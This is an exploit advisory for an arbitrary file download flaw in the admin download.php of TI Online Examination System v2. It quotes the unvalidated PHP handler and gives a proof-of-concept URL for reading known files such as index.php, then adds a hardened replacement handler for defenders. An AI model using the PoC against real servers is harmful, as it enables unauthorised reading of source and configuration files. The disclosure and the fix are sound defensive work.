TI Online Examination System 2 Arbitrary File Download

2018.08.03
Credit: AkkuS
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
# Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Version: 2.0
# Category: Webapps
# Tested on: Kali Linux
# Description: The "Export" operation in the admin panel is vulnerable. An attacker can download and read any file whose name is known via "download.php".

====================================================

# Demo : server/admin/
# Vuln file : /admin/download.php (lines 115-120)

    $data_action = $_REQUEST['action'];
    if($data_action == 'downloadfile')
    {
        $file = $_REQUEST['file'];            // file name taken straight from the request, unvalidated
        $name = $file;                        // reused unchanged as the download name
        $result = output_file($file, $name);  // serves whatever path the client supplied

# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]

You can write the known file name instead of [filename]. For example: 'download.php' or 'index.php'

====================================================
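As an added defender's example (not the vendor's code), this is a hardened replacement for the download.php handler quoted above: it accepts only a bare file name, allowlists export extensions, confines the resolved path to a fixed export directory and requires an admin session. EXPORT_DIR, ALLOWED_EXT and the admin_id session key are assumptions, as is that session_start() has already run in the application's bootstrap.

```php
<?php
// Added example, not part of the TI Online Examination System code base.
const EXPORT_DIR  = '/var/www/app/exports';   // assumed location of generated export files
const ALLOWED_EXT = ['csv', 'xlsx', 'pdf'];    // assumed export formats the feature produces

function resolve_export_path(string $requested): ?string {
    // Only a bare file name is accepted: any directory component (../, /etc/...) is rejected.
    $name = basename($requested);
    if ($name === '' || $name !== $requested) {
        return null;
    }
    // Block source and configuration files such as download.php or index.php.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // realpath() follows symlinks, so confirm the final path is still inside EXPORT_DIR.
    $base = realpath(EXPORT_DIR);
    $path = realpath(EXPORT_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (($_REQUEST['action'] ?? '') === 'downloadfile') {
    // Require an authenticated admin session (session key is an assumption).
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('Forbidden');
    }
    $path = resolve_export_path((string) ($_REQUEST['file'] ?? ''));
    if ($path === null) {
        // Log rejected requests: repeated hits here are a useful detection signal.
        error_log('download.php: rejected file parameter ' . json_encode($_REQUEST['file'] ?? null));
        http_response_code(400);
        exit('Invalid file');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}
```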


Copyright 2024, cxsecurity.com